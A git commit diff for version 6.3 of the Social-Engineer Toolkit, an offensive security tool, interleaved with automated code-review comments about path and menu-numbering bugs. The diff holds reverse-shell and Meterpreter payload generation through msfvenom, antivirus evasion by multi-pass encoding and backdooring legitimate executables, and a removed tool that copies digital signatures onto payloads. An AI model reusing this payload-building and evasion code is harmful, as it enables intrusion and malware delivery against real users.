Multiple bug fixes and updates for version 6.3 release

root 2015-04-09 21:58:04 -04:00
parent 6cf475c798
commit 49a7cbc5d4
18 changed files with 166 additions and 372 deletions


@ -1,3 +1,26 @@
~~~~~~~~~~~~~~~~
version 6.3
~~~~~~~~~~~~~~~~
* removed old payloads that were no longer needed - pyinjector and multipyinjector to the job, standard meterpreter payloads all get picked up regardless of encoding
* fixed an issue causing PDF templates from not being properly created when selecting solo
* added ability for custom exe to properly execute when deploy binaries is still specified to OFF (it has to)
* rewrote java applet to incorporate custom binary selection
* added check to deploy binaries to auto select yes parameter 8 automatically
* removed disitools from SET - no longer needed in custom binary
* removed legit binary, no longer needed
* removed three config options no longer needed
* defaulted the memory injection technique as the main method for old payloads
* added additional obfuscation around AES generation and making sure static sigs cant hit it
* stablized MSSQL bruter and injection through powershell
* fixed webjacking that would cause the menu to bomb out if invalid responses
* fixed an issue when importing a custom payload, it would try to kick off a listener which it shouldnt
* added additional wording about when specifying a custom payload that you will need to create your own listener
* added flag replacement variable for param name 8 which will indicate a randomized four alphanumeric for custom payload delivery - this will allow custom payloads to function properly without triggering powershell or other exploitation methods
* added the ability for powershell to execute first and if successful then not drop binary stager as last resort
* added a workaround for a metasploit bug that would cause bundle install issues when launching directly within the /opt/metasploit/apps/pro/msf3 directory or within the /usr/share/ framework directory. I first check for /usr/bin/msfconsole first and if there I do not append to the path variable in order to launch from anywhere
* added ability to use default msfconsole launcher if applicable from any path instead of from home directory - fixed in psexec, powershell injection, java applet, custom payloads, etc.
~~~~~~~~~~~~~~~~
version 6.2
~~~~~~~~~~~~~~~~


@ -74,7 +74,7 @@ if trigger == 2 or trigger == 3:
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j")
filewrite.close()
subprocess.Popen("ruby %s/msfconsole -L -r %s/meta_config" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -L -r %s/meta_config" % (msf_path, setdir), shell=True).wait()
else:
print_warning("cancelling...")
sleep (2)
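Review bot: The rewritten command at L44 only works because meta_path() now returns either "" (msfconsole on PATH) or a directory that ends in "/", so `"%smsfconsole"` is concatenated without a separator; two call sites touched by this commit keep the old form, `"%s/msfconsole -r %s" % (meta_path,listen_path)` (L596) and `"%s/msfcli …" % (meta_path, …)` (L231), and with an empty msf_path both produce a leading-slash path that does not exist. They should read `"%smsfconsole -r %s"` and `"%smsfcli …"` respectively, and a comment above this line, `# msf_path is "" when msfconsole is on PATH, otherwise a directory ending in "/"`, would record the assumption. Since the line is being rewritten anyway, passing the argv as a list without `shell=True` would also stop the interpolated setdir value from reaching the shell unquoted. The enclosing `if trigger` block starts before this hunk.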


@ -99,22 +99,12 @@ def ms_payload_2(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1':"windows/shell_reverse_tcp",
'2':"windows/meterpreter/reverse_tcp",
'3':"windows/vncinject/reverse_tcp",
'4':"windows/shell_bind_tcp",
'5':"windows/x64/shell_bind_tcp",
'6':"windows/x64/shell_reverse_tcp",
'7':"windows/x64/meterpreter/reverse_tcp",
'8':"windows/meterpreter/reverse_tcp_allports",
'9':"windows/meterpreter/reverse_https",
'10':"windows/meterpreter/reverse_tcp_dns",
'11':"set/reverse_shell",
'12':"set/reverse_shell",
'13':"set/reverse_shell",
'14':"shellcode/alphanum",
'15':"shellcode/pyinject",
'16':"shellcode/multipyinject",
'1':"shellcode/pyinject",
'2':"shellcode/multipyinject",
'3':"set/reverse_shell",
'4':"set/reverse_shell",
'5':"set/reverse_shell",
'6':"shellcode/alphanum",
}.get(payload,"ERROR")
def ms_payload_3(payload):
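Review bot: The docstring at L52 does not say what the keys mean now that the table has been renumbered: '1'–'6' mirror the positions in payload_menu_1 of the web-attack menu, '7' (import your own executable) is intercepted by the caller at L400 and never reaches this lookup, and anything else yields the sentinel "ERROR" that callers must compare against. Suggested docstring: `""" Map a payload_menu_1 choice ('1'-'6') to its Metasploit/SET payload name; '7' (custom exe) is handled by the caller; unknown keys return "ERROR". """`. The menu text and this table are maintained in two files, so a comment naming the menu would help keep them aligned.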


@ -1,155 +0,0 @@
#!/usr/bin/env python
#
# Notes from rel1k here... Had to downgrade to 0.1, the latest (0.3 currently) uses a different way for checksums of the peheader.
# This dies and fails in 64 bit operating systems, since this is the older version, shouldn't be a big deal, still works as expected.
#
"""V0.1 2007/12/18 - 2008/01/09
tool to manipulate digital signatures in PE files
commands:
- delete signed-file unsigned-file
- copy signed-source-file unsigned-file signed-file
- extract signed-file signature
- add signature unsigned-file signed-file
Source code put in public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2007/12/21: added arguments
2008/01/09: code review
requires pefile:
http://code.google.com/p/pefile/
to install: setup.py install
"""
import pefile
import sys
from struct import *
def Usage():
"""Displays the usage of this tool
"""
print "Usage: disitool command [options] file ..."
print " disitool V0.1, tool to manipulate digital signatures in PE files"
print " commands:"
print " - delete signed-file unsigned-file"
print " - copy signed-source-file unsigned-file signed-file"
print " - extract signed-file signature"
print " - add signature unsigned-file signed-file"
print " Source code put in the public domain by Didier Stevens, no Copyright"
print " Use at your own risk"
print " https://DidierStevens.com"
def DeleteDigitalSignature(SignedFile, UnsignedFile=None):
"""Deletes the digital signature from file SignedFile
When UnsignedFile is not None, writes the modified file to UnsignedFile
Returns the modified file as a PE file
"""
pe = pefile.PE(SignedFile)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = 0
pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = 0
if address != 0:
new_file_data = pe.write()[0:address]
else:
new_file_data = pe.write()
if UnsignedFile:
f = file(UnsignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data
def CopyDigitalSignature(SignedSourceFile, UnsignedFile, SignedFile=None):
"""Extracts the digital signature from file SignedSourceFile and adds it to file UnsignedFile
When SignedFile is not None, writes the modified file to SignedFile
Returns the modified file as a PE file
"""
peSignedSource = pefile.PE(SignedSourceFile)
address = peSignedSource.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = peSignedSource.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
if address == 0:
print "Error: source file not signed"
return
signature = peSignedSource.write()[address:]
peUnsigned = DeleteDigitalSignature(UnsignedFile)
peSignedFile = pefile.PE(data=''.join(list(peUnsigned) + list(signature)))
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = len(peUnsigned)
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = size
new_file_data = peSignedFile.write()
if SignedFile:
f = file(SignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data
def ExtractDigitalSignature(SignedFile, SignatureFile=None):
"""Extracts the digital signature from file SignedFile
When SignatureFile is not None, writes the signature to SignatureFile
Returns the signature
"""
pe = pefile.PE(SignedFile)
address = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress
size = pe.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size
if address == 0:
print "Error: source file not signed"
return
signature = pe.write()[address+8:]
if SignatureFile:
f = file(SignatureFile, 'wb+')
f.write(signature)
f.close()
return signature
def AddDigitalSignature(SignatureFile, UnsignedFile, SignedFile=None):
"""Adds the digital signature from file SignatureFile to file UnsignedFile
When SignedFile is not None, writes the modified file to SignedFile
Returns the modified file as a PE file
"""
f = file(SignatureFile, 'rb')
signature = f.read()
f.close()
size = len(signature) + 8
peUnsigned = DeleteDigitalSignature(UnsignedFile)
peSignedFile = pefile.PE(data=''.join(list(peUnsigned) + list(unpack("4c", pack("i", size))) + ['\x00', '\x02', '\x02', '\x00'] + list(signature)))
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].VirtualAddress = len(peUnsigned)
peSignedFile.OPTIONAL_HEADER.DATA_DIRECTORY[pefile.DIRECTORY_ENTRY['IMAGE_DIRECTORY_ENTRY_SECURITY']].Size = size
new_file_data = peSignedFile.write()
if SignedFile:
f = file(SignedFile, 'wb+')
f.write(new_file_data)
f.close()
return new_file_data


@ -238,22 +238,12 @@ infectious_text = """
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Bind Shell Execute payload and create an accepting port on remote system',
'Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter All Ports Spawn a meterpreter shell and find a port home (every port)',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter',
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through PyInjector',
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via memory',
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
'PyInjector Shellcode Injection This will drop a meterpreter payload through PyInjector',
'MultiPyInjector Shellcode Injection This will drop multiple Metasploit payloads via memory',
'Import your own executable Specify a path for your own executable\n']
if operating_system == "windows" or msf_path == False:


@ -167,7 +167,7 @@ if exploit_counter == 0:
# START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload':
outfile = setdir + "/%s" % (outfile)
subprocess.Popen("ruby %s/msfcli %s PAYLOAD=%s LHOST=%s LPORT=%s OUTPUTPATH=%s FILENAME=%s %s ENCODING=shikata_ga_nai %s E" % (meta_path,exploit,payload,rhost,lport,outpath,outfile,target,inputpdf), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
subprocess.Popen("%s/msfcli %s PAYLOAD=%s LHOST=%s LPORT=%s OUTPUTPATH=%s FILENAME=%s %s ENCODING=shikata_ga_nai %s E" % (meta_path,exploit,payload,rhost,lport,outpath,outfile,target,inputpdf), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
subprocess.Popen("cp " + users_home + "/.msf4/local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
print_status("Payload creation complete.")
time.sleep(1)
@ -181,9 +181,9 @@ if exploit_counter == 0:
if noencode == 1:
execute1=("exe")
payloadname=("vb.exe")
subprocess.Popen("ruby %s/msfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True).wait()
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True).wait()
if noencode == 0:
subprocess.Popen("ruby %s/msfencode -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True).wait()
subprocess.Popen("%smsfencode -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True).wait()
# Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True).wait()
print_info("Raring the VBS file.")
@ -256,7 +256,7 @@ if exploit == "dll_hijacking":
if not os.path.isfile("%s/fileformat.file" % (setdir)):
print_info("This may take a few to load MSF...")
try:
child1=pexpect.spawn("ruby %s/msfconsole -L -r %s/meta_config" % (meta_path,setdir))
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
except:
try:
child1.close()


@ -32,49 +32,21 @@ stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off": stage_encoding = "false"
else: stage_encoding = "true"
# grab configuration options
encount="4"
configfile=file("%s/config/set_config" % (definepath),"r").readlines()
# check the metasploit path
msf_path = meta_path()
# check the config files for all of the flags needed for the file
encount=check_config("ENCOUNT=")
auto_migrate=check_config("AUTO_MIGRATE=")
digital_steal=check_config("DIGITAL_SIGNATURE_STEAL=")
meterpreter_multi = check_config("METERPRETER_MULTI_SCRIPT=")
linux_meterpreter_multi=check_config("LINUX_METERPRETER_MULTI_SCRIPT=")
meterpreter_multi_command=check_config("METERPRETER_MULTI_COMMANDS=")
meterpreter_multi_command = meterpreter_multi_command.replace(";", "\n")
linux_meterpreter_multi_command = check_config("LINUX_METERPRETER_MULTI_COMMANDS=")
linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "\n")
upx_encode = check_config("UPX_ENCODE=")
upx_path = check_config("UPX_PATH=")
if operating_system != "windows":
if not os.path.isfile(upx_path):
print_error("ERROR: UPX packer was not found. Disabling UPX packing.")
upx_encode = "OFF"
unc_embed = check_config("UNC_EMBED=")
# add the digital signature stealing
if digital_steal == "ON":
try:
debug_msg(me,"importing Python module 'pefile'",1)
try: reload(pefile)
except: import pefile
sys.path.append("src/core/digitalsig/")
debug_msg(me,"importing 'src.core.digitalsig.disitool'",1)
try: reload(disitool)
except: import disitool
except ImportError:
if operating_system != "windows":
print_error("Error:PEFile not detected. You must download it from http://code.google.com/p/pefile/")
print_warning("Turning the digital signature stealing flag off... A/V Detection rates may be lower.")
digital_steal = "OFF"
attack_vector=0
linosx=0
multiattack=""
@ -97,29 +69,15 @@ multiattack_java="off"
if os.path.isfile(setdir + "/multi_java"):
multiattack_java="on"
# grab binary path if needed
fileopen=file("config/set_config", "r")
for line in fileopen:
match=re.search("CUSTOM_EXE=", line)
if match:
line=line.rstrip()
line=line.replace("CUSTOM_EXE=", "")
custom_exe=line
if custom_exe == "legit.binary": custom_exe="src/payloads/exe/legit.binary"
# custom payloadgen
payloadgen="regular"
if os.path.isfile(setdir + "/payloadgen"):
payloadgen="solo"
# set ipquestion to blank until otherwise pulled
ipquestion=""
####################################################################################################################################
# grab ipaddr if it hasn't been identified yet
####################################################################################################################################
if check_options("IPADDR=") == False:
fileopen=file("config/set_config", "r")
data = fileopen.read()
@ -149,8 +107,8 @@ try:
# Specify path to metasploit
path=msf_path
# Specify payload
# this is encoding
encode=""
# this is payload
choice1=""
@ -179,27 +137,16 @@ try:
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
if operating_system == "windows" or msf_path == False:
# default blank then select SETSHELL
# default blank then select pyinjector
if choice1 == "":
choice1 = "11"
# if we specify choice 1, thats SETSHELL
if choice1 == "1":
choice1 == "11"
# if we specify choice 2, thats the SET reverse http shell
if choice1 == "2":
choice1 = "12"
# selecting ratte
if choice1 == "3":
choice1 = "13"
choice1 = "1"
# if they specified something else that wasn't there just default to SETSHELL
else: choice1 = "11"
# check the length and make sure it works
if choice1 != "":
choice1 = check_length(choice1,17)
choice1 = check_length(choice1,7)
# convert it to a string
choice1 = str(choice1)
custom=0
counter=0
flag=0
@ -212,38 +159,39 @@ try:
exit_set()
if choice1 == '':
choice1 = ("11")
choice1 = ("1")
if choice1 == '5' or choice1 == '6' or choice1 == '7':
encode_stop = 1
encode = ""
if choice1 == '8':
if choice1 == '7':
flag = 1
# here we specify shellcodeexec
if choice1 == '14' or choice1 == '15' or choice1 == '16':
if choice1 == '1' or choice1 == '2' or choice1 == '6':
encode_stop = 1
encode = 0
# 11 is the set interactive shell, 12 is set rev http shell and 13 is ratte listener
if choice1 == '11' or choice1 == '12' or choice1 == "13":
if choice1 == '3' or choice1 == '4' or choice1 == "5":
encoder = 'false'
payloadgen = 'solo'
encode_stop = 1
filewrite = file(setdir + "/set.payload", "w")
# select setshell
if choice1 == '11':
if choice1 == '3':
filewrite.write("SETSHELL")
# select setshell_reverse
if choice1 == '12':
if choice1 == '4':
filewrite.write("SETSHELL_HTTP")
# select ratte
if choice1 == '13':
if choice1 == '5':
filewrite.write("RATTE")
filewrite.close()
if choice1 != "17":
if choice1 != "7":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
@ -252,7 +200,7 @@ try:
courtesyshell=("")
# if custom
if choice1=='17':
if choice1=='7':
print_info("Example: /root/custom.exe")
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
@ -261,6 +209,7 @@ try:
choice1=raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1):
break
update_options("CUSTOM_EXE=%s" % (choice1))
custom=1
@ -287,40 +236,6 @@ try:
filewrite.write(data)
filewrite.close()
if custom == 0:
if encode_stop == 0 and encode != "16" and choice1 != "set/reverse_shell":
###################################################
# USER INPUT: SHOW ENCODER MENU #
###################################################
debug_msg (me,"printing 'text.encoder_menu'",5)
show_encoder_menu = create_menu(encoder_text, encoder_menu)
encode = raw_input(setprompt(["18"], ""))
encoder="true"
if encode == 'exit':
exit_set()
# turn off some options if fasttrack is in use
if os.path.isfile(setdir + "/fasttrack.options"):
upx_encode == "OFF"
encode = "2"
encoder = "true"
# Handle special cases
if encode=='' or encode == ' ': encode = '1'
if encode == '1':
encount="4"
if encode=='14' or encode == '0': encoder="false"
# do dictionary lookup
encode1 = encoder_type(encode)
encode = "x86/" + encode1
if encode == "x86/MULTIENCODE" or encode == "x86/BACKDOOR":
encode = encode.replace("x86/", "")
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
choice2=raw_input(setprompt(["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
@ -328,17 +243,11 @@ try:
choice2 = check_options("IPADDR=")
# grab interface ip address
if os.path.isfile(setdir + "/interface"):
fileopen=file(setdir + "/interface", "r").readlines()
for line in fileopen:
line=line.rstrip()
ipquestion=line
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
if custom == 0:
choice3=raw_input(setprompt(["4"], "PORT of the listener [443]"))
# here we check if the user really wants to use port 80
if choice3 == "80":
@ -384,10 +293,11 @@ try:
# if we aren't using the set reverse shell
if choice1 != "set/reverse_shell":
# if we aren't using shellcodeexec
if choice1 != "shellcode/alphanum":
if choice1 != "shellcode/pyinject":
if choice1 != "shellcode/multipyinject":
generatepayload=subprocess.Popen(r"ruby %s/msfvenom -p %s LHOST=%s %s --format %s > %s %s" % (path,choice1,choice2,portnum,choice4,setdir,msf_filename), shell=True).wait()
#if choice1 != "shellcode/alphanum":
# if choice1 != "shellcode/pyinject":
# if choice1 != "shellcode/multipyinject":
# generatepayload=subprocess.Popen(r"ruby %s/msfvenom -p %s LHOST=%s %s --format %s > %s %s" % (path,choice1,choice2,portnum,choice4,setdir,msf_filename), shell=True).wait()
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
@ -467,7 +377,6 @@ try:
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
# fix port num
if "multipyinject" in choice1:
portnum = shellcode_port
@ -511,7 +420,7 @@ try:
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
print_status("Encrypting the shellcode via 256 AES encryption..")
print_status("Encrypting the shellcode via AES 256 encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
@ -520,10 +429,8 @@ try:
filewrite.close()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# close the pyinjector file for ports and payload
payload_options.close()
# here we are going to encode the payload via base64
fileopen = file("%s/meterpreter.alpha_decoded" % (setdir), "r")
data = fileopen.read()
@ -570,10 +477,6 @@ try:
if choice1 == "shellcode/multipyinject":
fileopen = file("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb")
filewrite = file("%s/shellcodeexec.custom" % (setdir), "wb")
data = fileopen.read()
filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
# we need to read in the old index.html file because its already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
@ -620,6 +523,7 @@ try:
print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (setdir)):
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
@ -636,50 +540,22 @@ try:
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if deploy_binaries.lower() == "y" or deploy_binaries.lower() == "yes":
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), stdout=subprocess.PIPE, shell=True)
if encoder == "true":
# If not option 16 or default then go here
if encode != "MULTIENCODE":
if encode != "BACKDOOR":
print_info("Encoding the payload %s times. [-]\n" % (str(encount)))
encodepayload=subprocess.Popen(r"ruby %s/msfencode < %s/1msf.exe -e %s -o %s/msf.exe -t exe -c %s" % (path,setdir,encode,setdir,encount), shell=True).wait()
# If option 16 or default then go here
if encode == "MULTIENCODE":
print_info("Encoding the payload multiple times to get around pesky Anti-Virus.")
encodepayload=subprocess.Popen(r"ruby %s/msfencode -e x86/shikata_ga_nai -i %s/1msf.exe -t raw -c 5 | ruby %s/msfencode -t raw -e x86/alpha_upper -c 2 | ruby %s/msfencode -t raw -e x86/shikata_ga_nai -c 5 | ruby %s/msfencode -t exe -c 5 -e x86/countdown -o %s/msf.exe" % (path,setdir,path,path,path,setdir), shell=True).wait()
encode1=("x86/countdown")
# If option 16, backdoor executable better AV avoidance
if encode == "BACKDOOR":
print_info("Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...")
backdoor_execution = check_config("BACKDOOR_EXECUTION=").lower()
if backdoor_execution == "on": backdoor_execution = "-k"
if backdoor_execution != "on": backdoor_execution = ""
subprocess.Popen("cp %s %s/legit.exe 1> /dev/null 2> /dev/null" % (custom_exe,setdir), shell=True).wait()
encodepayload=subprocess.Popen(r"ruby %s/msfvenom -p %s LHOST=%s %s -c 10 -e x86/shikata_ga_nai -x %s/legit.exe --format exe > %s/msf.exe" % (path,choice1,choice2,portnum,path,setdir,setdir), shell=True).wait()
print_status("Backdoor completed successfully. Payload is now hidden within a legit executable.")
# define to use UPX or not
if upx_encode == "ON":
if choice1 != "set/reverse_shell":
print_status("UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.")
upx("%s/msf.exe" % (setdir))
# define to use digital signature stealing or not
if digital_steal == "ON":
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
disitool.CopyDigitalSignature("src/core/digitalsig/digital.signature", setdir + "/msf.exe", setdir + "/msf2.exe")
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe" % (setdir,setdir), shell=True).wait()
encode1=("x86/shikata_ga_nai")
if choice1 == 'windows/shell_bind_tcp' or choice1 == 'windows/x64/shell_bind_tcp' :
print_info("When the payload is downloaded, you will want to connect to the victim directly.")
# here we specify the binary to deploy if we are using ones that are required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum":
fileopen3 = fileopen = file("%s/web_clone/index.html" % (setdir), "r")
filewrite = file("%s/web_clone/index.html.new" % (setdir), "w")
data = fileopen3.read()
# check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell": attack_vector = "set_payload"
@ -708,7 +584,6 @@ try:
osx_path = raw_input("Enter the path for the custom OSX payload (blank for nothing): ")
if os.path.isfile(osx_path): break
if osx_path != "":
# copy the payload
shutil.copyfile(osx_path, setdir + "/mac.bin")
@ -726,8 +601,8 @@ try:
# copy the payload
shutil.copyfile(lin_path, setdir + "/nix.bin")
else:
port2=check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
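Review bot: The fallback `else: choice1 = "11"` at L353 still uses the pre-6.3 numbering: the windows/no-Metasploit branch above it now maps a blank choice to "1" (L351), and the payload table in this commit only has keys '1'–'6' plus the custom '7' checked at L400, so any non-blank choice on that branch becomes `ms_payload_2("11")` → "ERROR" instead of the SET interactive shell the comment at L352 promises; it should read `else: choice1 = "3"` (the SETSHELL key per L388). Separately, with the digital-signature step removed (L556–L558), one of the two `cp %s/msf2.exe %s/msf.exe` lines at L559/L560 survives and now runs unconditionally: nothing in this path creates msf2.exe any more, so the copy fails, and if a stale msf2.exe from an earlier run exists in setdir it silently overwrites the freshly built msf.exe — the line should go with the block it served. The enclosing `try:` block starts before the first hunk of this file.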


@ -27,7 +27,7 @@ if choice == "YES":
if os.path.isfile(setdir + "/meta_config_multipyinjector"):
listen_path = (setdir + "/meta_config_multipyinjector")
subprocess.Popen("ruby %s/msfconsole -L -r %s" % (meta_path,listen_path), shell=True).wait()
subprocess.Popen("%s/msfconsole -r %s" % (meta_path,listen_path), shell=True).wait()
# if we did select the set payload as our option
if os.path.isfile(setdir + "/set.payload"):


@ -230,7 +230,7 @@ def print_error(message):
print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC
def get_version():
define_version = '6.2'
define_version = '6.3'
return define_version
class create_menu:
@ -295,15 +295,16 @@ def meta_path():
if os.path.isfile("/opt/metasploit/msf3/msfconsole"):
msf_path = "/opt/metasploit/msf3/"
trigger = 1
if os.path.isfile("/usr/bin/msfconsole"):
msf_path = ""
trigger = 1
# specific for pwnpad and pwnplug (pwnie express)
if os.path.isfile("/opt/metasploit-framework/msfconsole"):
msf_path = "/opt/metasploit-framework"
msf_path = "/opt/metasploit-framework/"
trigger = 1
if os.path.isfile("/usr/bin/msfconsole"):
msf_path = ""
trigger = 1
if trigger == 0:
if check_os() != "windows":
check_metasploit = check_config("METASPLOIT_MODE=").lower()
@ -764,7 +765,7 @@ def show_banner(define_version,graphic):
[---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---]
[---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---]
[---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---]
[---] Codename: '""" + bcolors.YELLOW + """Recharge""" + bcolors.BLUE + """' [---]
[---] Codename: '""" + bcolors.YELLOW + """#HugLife""" + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE+ """@TrustedSec""" + bcolors.BLUE+""" [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE+ """@HackingDave""" + bcolors.BLUE+""" [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE+""" [---]
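Review bot: meta_path() now returns either "" (msfconsole on PATH, L613–L615) or a directory with a trailing "/" (L611, L619), and every caller rewritten in this commit formats `"%smsfconsole"` against it, but that contract is written nowhere; a comment at the top of the probe sequence, `# msf_path is "" when msfconsole is on PATH, otherwise a directory ending in "/"; callers concatenate with no separator`, would stop the next `"%s/msfconsole"` from creeping back in (two already remain, L231 and L596). Because each `if` overwrites msf_path, the last matching probe wins, so the /usr/bin check placed before the /opt/metasploit-framework check (L617–L620) is overridden on a host that has both; if the PATH install is meant to take precedence the probes need `elif` ordering or an explicit precedence comment. meta_path() continues outside the hunk.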


@ -79,7 +79,7 @@ try:
msf_path = meta_path()
# launch metasploit below
print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("ruby %s/msfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
subprocess.Popen("%smsfconsole -L -r %s/reports/powershell/powershell.rc" % (msf_path, setdir), shell=True).wait()
# handle exceptions
